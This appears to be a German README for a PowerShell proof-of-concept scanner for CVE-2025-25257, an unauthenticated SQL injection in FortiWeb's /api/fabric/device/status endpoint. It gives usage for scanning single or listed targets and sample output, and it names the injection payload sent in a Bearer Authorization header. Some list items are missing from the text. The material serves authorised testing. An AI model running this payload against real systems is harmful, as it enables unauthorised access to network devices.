
CVE-2025-25257 PoC for educational use and/or authorised pentesting.
Dieses PowerShell-Skript ist ausschließlich für autorisierte Penetrationstests bestimmt. Es testet Fortinet FortiWeb-Geräte auf CVE-2025-25257, eine nicht authentifizierte SQL-Injection-Schwachstelle im Endpunkt /api/fabric/device/status.
Das Skript:
Wichtiger Haftungsausschluss:
Dieses Tool ist ausschließlich für den ethischen, autorisierten Einsatz in Penetrationstests oder Schwachstellenbewertungsszenarien vorgesehen. Nicht autorisierte Nutzung kann gegen Gesetze wie den Computer Fraud and Abuse Act (CFAA) oder entsprechende Regelungen in Ihrem Rechtsraum verstoßen. Stellen Sie sicher, dass Sie die ausdrückliche Genehmigung des Zielinhabers haben, bevor Sie dieses Skript ausführen. Der Autor übernimmt keine Haftung für Missbrauch.
Invoke-WebRequest.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
Das Skript befindet sich unter script.ps1.
Führen Sie das Skript in PowerShell mit einer der folgenden Optionen aus:
Geben Sie eine einzelne IP oder einen DNS-Namen an, optional mit einem Port (z.B. 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
Oder ohne Port (scannt Standardports):
.\script.ps1 -Target "example.com"
Geben Sie eine Textdatei mit einem Ziel pro Zeile an (z.B. targets.txt).
.\script.ps1 -InputFile "targets.txt"
Beispielinhalt von targets.txt:
192.168.1.1:443
example.com
10.0.0.1
Das Skript gibt Ergebnisse für jedes Ziel und jeden Port aus, einschließlich:
Beispielausgabe:
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization-Header (Bearer AAAAAA'or'1'='1).Beiträge sind willkommen! Bitte forken Sie das Repository und reichen Sie einen Pull-Request mit Verbesserungen, Fehlerbehebungen oder zusätzlichen Funktionen ein.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
Bei Fragen oder Problemen öffnen Sie ein GitHub-Issue.